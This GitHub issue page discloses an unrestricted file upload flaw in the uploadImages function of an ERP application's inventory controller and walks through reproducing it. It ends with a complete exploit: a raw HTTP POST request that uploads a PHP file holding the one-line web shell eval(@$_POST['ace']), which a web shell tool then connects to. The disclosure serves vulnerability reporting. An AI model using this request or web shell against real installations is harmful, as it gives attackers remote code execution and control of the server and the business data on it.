Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

File upload vulnerability getshell #3

Closed
huclilu opened this issue Nov 8, 2022 · 0 comments
Closed

File upload vulnerability getshell #3

huclilu opened this issue Nov 8, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Nov 8, 2022

一. ERP has file upload vulnerability getshell

Build environment: Apache: 2.4.39; MySQL:5.7.26

ERP is available in application/controllers/basedata/inventory In php, the uploadImages function controls the file upload. It does not check the uploaded files. The uploaded files are saved in the path/data/upload/tools/. Use the webshell tool to connect the uploaded PHP file, and then you can getshell

二:Vulnerability recurrence:

  • Log in to the background and click Commodity Management

  • Click the image logo to add an image

  • Upload PHP Trojan Files

  • Code audit to find the path to upload files

  • Access the uploaded PHP script file and use the webshell management tool to connect

三:Exploit POC

POST /index.php/basedata/inventory/uploadImages HTTP/1.1
Host: erpvul.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------603434773180687952821431423
Content-Length: 259
Origin: http://erpvul.test
Connection: close
Referer: http://erpvul.test/index.php/settings/fileUpload?_=1667908773850
Cookie: PHPSESSID=3l3leefu97g2h54kie8t9jggu4

-----------------------------603434773180687952821431423
Content-Disposition: form-data; name="files[]"; filename="ace.php"
Content-Type: application/octet-stream

<?php eval(@$_POST['ace']);?>
-----------------------------603434773180687952821431423--
@huclilu huclilu closed this as completed Nov 11, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant